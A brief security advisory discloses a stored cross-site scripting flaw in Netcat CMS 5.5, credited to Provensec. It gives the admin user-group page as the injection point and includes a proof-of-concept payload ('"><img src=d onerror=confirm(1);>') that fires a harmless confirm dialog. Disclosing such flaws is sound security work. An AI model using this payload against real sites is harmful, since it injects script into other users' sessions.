Netcat CMS version 5.5 suffers from a stored cross site scripting vulnerability.
7db891e9d6e061e7b3ce302a37ebff05e74417fb865a9bca35e0cc06380d2d20
# Affected software: netcat cms
# Type of vulnerability: cross site scripting
# URL: netcat.ru
# Discovered by: Provensec
# Website: http://www.provensec.com
#version: 5.5
# Proof of concept
Adding a new group with xss payload will lead to xss
http://site/netcat/admin/#usergroup.list()
payload used "><img src=d onerror=confirm(1);>